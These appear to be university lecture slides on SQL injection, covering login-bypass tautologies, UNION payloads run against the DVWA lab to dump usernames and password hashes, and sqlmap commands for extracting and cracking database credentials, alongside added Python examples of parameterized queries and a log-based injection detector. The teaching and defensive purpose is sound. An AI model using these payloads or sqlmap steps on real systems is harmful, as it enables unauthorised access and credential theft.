15/10/2024
       
                   Lecturer: Nguyễn Thị Thanh Vân – FIT - HCMUTE
   SQL Injection attacks
     o Example
   Damn Vulnerable Web App – DVWA
     o Examples
   Sqlmap
     o Examples
   SQL injection can do more harm than just bypassing the login
    logic. Some of the attacks include:
     o Deleting data
     o Updating data
     o Inserting data
     o Executing commands on the server that download and
         install malicious programs such as Trojans
     o Exporting valuable data such as credit card details, e-mail addresses, and
       passwords to the attacker's remote server
     o Getting user login details, etc.
 Crack username/password
   o SQL query:
SELECT * FROM Users WHERE Username='$username' AND
Password='$password'
   o Type:
$username = 1' or '1' = '1
$password = 1' or '1' = '1
   o The query will be:
SELECT * FROM Users WHERE Username='1' OR '1' = '1'
AND Password='1' OR '1' = '1'
   => always true (OR '1' = '1') => the system authenticates the user
    without knowing a valid username or password.
   SQL query:
SELECT * FROM products WHERE id_product=$id_product
   Ex:
http://www.example.com/product.php?id=10
   Using the operators AND and OR, first send a condition that is always false:
SELECT * FROM products WHERE id_product=10 AND 1=2
   Ex:
http://www.example.com/product.php?id=10 AND 1=2
   => no content is returned or a blank page is shown.
  Then send a condition that is always true and check whether a valid result comes back:
   Ex: http://www.example.com/product.php?id=10 AND 1=1
   => if product 10 is displayed again while the false condition showed nothing,
    the id parameter is being evaluated as part of the SQL statement.
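The login bypass from the previous slide and the AND 1=2 / AND 1=1 probe above, reproduced as an added example that is not part of the lecture: a vulnerable string-concatenated query next to the parameterized query that closes the hole. It runs on an in-memory SQLite database with constructed rows (SQLite stands in for MySQL because it ships with Python); the table and column names follow the slides, and the function names are this example's own.

```python
import sqlite3


def make_db():
    """Constructed sample data standing in for the slides' Users and products tables."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (Username TEXT, Password TEXT)")
    conn.execute("INSERT INTO Users VALUES ('alice', 's3cret')")
    conn.execute("CREATE TABLE products (id_product INTEGER, name TEXT)")
    conn.executemany("INSERT INTO products VALUES (?, ?)",
                     [(10, "widget"), (11, "gadget")])
    return conn


def login_vulnerable(conn, username, password):
    # Mirrors the slide: user input is pasted straight into the SQL text,
    # so a quote in the input ends the string literal and the rest is parsed as SQL.
    query = (f"SELECT * FROM Users WHERE Username='{username}' "
             f"AND Password='{password}'")
    return conn.execute(query).fetchall()


def login_safe(conn, username, password):
    # Parameterized query: the values travel separately from the statement,
    # so quotes and keywords in the input are compared as data, never executed.
    query = "SELECT * FROM Users WHERE Username=? AND Password=?"
    return conn.execute(query, (username, password)).fetchall()


def product_vulnerable(conn, id_param):
    # Mirrors product.php?id=...: a numeric parameter with no quoting at all,
    # so "10 AND 1=2" simply extends the WHERE clause.
    query = f"SELECT * FROM products WHERE id_product={id_param}"
    return conn.execute(query).fetchall()


def product_safe(conn, id_param):
    # Validate the type first, then bind it; "10 AND 1=1" is not an integer
    # and is rejected before any SQL is built.
    try:
        id_value = int(id_param)
    except ValueError:
        return []
    query = "SELECT * FROM products WHERE id_product=?"
    return conn.execute(query, (id_value,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    payload = "1' or '1' = '1"          # the slide's username/password input
    print("vulnerable login:", login_vulnerable(db, payload, payload))
    print("safe login:      ", login_safe(db, payload, payload))
    print("vulnerable id, false condition:", product_vulnerable(db, "10 AND 1=2"))
    print("vulnerable id, true condition: ", product_vulnerable(db, "10 AND 1=1"))
    print("safe id, true condition:       ", product_safe(db, "10 AND 1=1"))
```

The vulnerable login returns alice's row for the tautology input while the parameterized version returns nothing; the vulnerable product lookup shows the same empty-versus-non-empty difference between the two conditions that the slide uses as its injection test, whereas the safe version rejects both.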
  Damn Vulnerable Web App (DVWA) is a PHP/MySQL web
   application that is damn vulnerable. Its main goals are to be an aid for
   security professionals to test
 1.1 Download DVWA
 1.2 Create the database and user for DVWA
 1.3 Configure DVWA
 1.4 Set up the basic database in DVWA
 1.5 Access DVWA
http://10.0.0.2/login.php
 Set the DVWA Security Level: Low, Medium, High
     o   SQL Injection
     o   SQL Injection (Blind)
   Basic injection: 1
   Always-true scenario: %' or '0'='0
   Display database version:
     o %' or 0=0 union select null, version() #
   Display database user:
     o %' or 0=0 union select null, user() #
   Display database name:
     o %' or 0=0 union select null, database() #
   Display all tables listed in information_schema:
     o %' and 1=0 union select null, table_name from
         information_schema.tables #
   Display all tables in information_schema whose name starts with "user":
     o %' and 1=0 union select null, table_name from
         information_schema.tables where table_name like 'user%'#
   Display all columns of the users table (read from
    information_schema.columns):
     o %' and 1=0 union select null,
         concat(table_name,0x0a,column_name) from
         information_schema.columns where table_name = 'users' #
   Display the contents of those columns from the
    users table:
     o %' and 1=0 union select null,
         concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from
         users #
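The payloads on this and the previous slide leave a recognisable trail in the web server's access log. As an added example that is not part of the lecture, the scanner below decodes the query string of each request and flags the building blocks those payloads share (UNION ... SELECT, information_schema, an OR/AND tautology, a trailing comment). The log lines are constructed for this example and carry the lecture's own payloads URL-encoded; the `REQUEST_RE` layout assumes the Apache combined log format. Signature matching of this kind is only a detective control and misses encoded or obfuscated variants; the preventive fix remains parameterized queries in the application.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample log lines (Apache combined format) built for this example.
SAMPLE_LOG = r'''
192.168.1.50 - - [15/Oct/2024:10:01:02 +0700] "GET /dvwa/vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1" 200 4312 "-" "Mozilla/5.0"
192.168.1.50 - - [15/Oct/2024:10:01:09 +0700] "GET /dvwa/vulnerabilities/sqli/?id=%25%27+or+%270%27%3D%270&Submit=Submit HTTP/1.1" 200 6120 "-" "Mozilla/5.0"
192.168.1.50 - - [15/Oct/2024:10:01:15 +0700] "GET /dvwa/vulnerabilities/sqli/?id=%25%27+or+0%3D0+union+select+null%2C+version%28%29+%23&Submit=Submit HTTP/1.1" 200 4400 "-" "Mozilla/5.0"
192.168.1.50 - - [15/Oct/2024:10:01:21 +0700] "GET /dvwa/vulnerabilities/sqli/?id=%25%27+and+1%3D0+union+select+null%2C+table_name+from+information_schema.tables+%23&Submit=Submit HTTP/1.1" 200 9800 "-" "Mozilla/5.0"
192.168.1.77 - - [15/Oct/2024:10:02:00 +0700] "GET /product.php?id=10 HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
192.168.1.77 - - [15/Oct/2024:10:02:05 +0700] "GET /product.php?id=10+AND+1%3D2 HTTP/1.1" 200 310 "-" "Mozilla/5.0"
'''

# Client IP, timestamp, method, request target, status and size of a combined-format line.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)

# Each signature names one building block seen in the lecture's payloads.
SIGNATURES = {
    "union_select": re.compile(r"\bunion\b.{0,20}\bselect\b", re.I),
    "schema_probe": re.compile(r"\binformation_schema\b", re.I),
    "tautology": re.compile(r"\b(or|and)\b\s*'?\w+'?\s*=\s*'?\w+'?", re.I),
    "comment_tail": re.compile(r"(#|--\s|/\*)"),
}


def decode_params(target):
    """Return (name, value) pairs of the query string, percent-decoded once."""
    query = urlsplit(target).query
    return parse_qsl(query, keep_blank_values=True)


def scan_line(line):
    """Return an alert dict for a suspicious request, or None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None                      # not a request line we understand
    hits = set()
    for name, value in decode_params(m.group("target")):
        for sig, pattern in SIGNATURES.items():
            if pattern.search(value):
                hits.add((name, sig))
    if not hits:
        return None
    return {"ip": m.group("ip"), "ts": m.group("ts"),
            "target": m.group("target"), "hits": sorted(hits)}


def scan_log(text):
    """Scan every line of a log and return the alerts in order."""
    return [a for a in (scan_line(l) for l in text.strip().splitlines()) if a]


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert["ip"], alert["ts"], alert["hits"])
```

Four of the six constructed lines raise an alert, each keyed to the `id` parameter: the always-true probe and the `10 AND 1=2` probe trip only the tautology signature, while the two UNION payloads also trip the comment and (for the second) the information_schema signatures. Benign requests such as `id=1` or `id=10` pass silently.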
   Get important information from the DVWA database (user/pass)
    at each security level:
     o Low
     o Medium
     o High
   sqlmap is an open source penetration testing tool that
    automates the process of
     o detecting and exploiting SQL injection flaws
     o taking over database servers.
   It comes with a kick-ass detection engine
   Many niche features for
     o the ultimate penetration tester
     o a broad range of switches ranging from database fingerprinting,
     o over data fetching from the database,
     o to accessing the underlying file system and executing
         commands on the operating system via out-of-band connections.
  Download and install sqlmap:
http://sqlmap.sourceforge.net/doc/README.html#s1
           Open Firefox and add the Tamper Data add-on to the Tools menu
             o Select Tools > Tamper Data
             o Start Tamper Data
           Or: press F12 to open the browser developer tools
           Ex, shown in DVWA:
    Run SQL injection
    Prepare: tamper with the request
      o Copy the Referer URL (Ref)
      Ex: "http://192.168.1.106/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit"
      o Copy the cookie information (Coo)
      Ex: "PHPSESSID=lpb5g4uss9kp70p8jccjeks621; security=low"
    Run sqlmap to obtain the following pieces of information
      o Obtain the database user for DVWA. Syntax:
      ./sqlmap.py -u <Ref> --cookie=<Coo> -b --current-db --current-user
      o Ex: ./sqlmap.py -u
         "http://192.168.1.106/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit"
         --cookie="PHPSESSID=lpb5g4uss9kp70p8jccjeks621; security=low" -b
         --current-db --current-user
      Do you want to keep testing? Y => Result
   Run sqlmap
    o Obtain database management usernames and password hashes. Syntax:
    ./sqlmap.py -u <Ref> --cookie=<Coo> --string="Surname" --users
    --passwords
    Use dictionary attack? Y
    Dictionary location? <Press Enter>
    o Obtain the privileges of the db_hacker database user. Syntax:
    ./sqlmap.py -u <Ref> --cookie=<Coo> -U db_hacker --privileges
    o Obtain a list of all databases.
    ./sqlmap.py -u <Ref> --cookie=<Coo> --dbs
    o Obtain the tables of the "dvwa" database
    ./sqlmap.py -u <Ref> --cookie=<Coo> -D dvwa --tables
    o Obtain the columns of table dvwa.users
    ./sqlmap.py -u <Ref> --cookie=<Coo> -D dvwa -T users --columns
   Run sqlmap
    o Obtain users and their passwords from table dvwa.users. Syntax:
    ./sqlmap.py -u <Ref> --cookie=<Coo> -D dvwa -T users -C
    user,password --dump
    Do you want to use the LIKE operator? Y
    Recognize possible hash values? Y
    What's the dictionary location? <Press Enter>
    Use common password suffixes? Y
    Use sqlmap to obtain the following pieces of information:
     o A list of Database Management Usernames and Passwords.
     o A list of databases
     o A list of tables for a specified database
     o A list of users and passwords for a specified database table.
1.   DVWA: SQL Injection, SQL Injection (Blind) (2)
     o Get important information from the DVWA database, such as tables and
         user/pass, at each security level: Low, Medium, High
2.   Sqlmap: (2)
     o Get important information from the DVWA database: tables, user/pass,
         at each security level: Low, Medium, High
     o Database of another practice website, ex:
             • http://testphp.vulnweb.com
3.   Other tools: (1)
     o Hackbar (browser add-on) against a vulnerable website.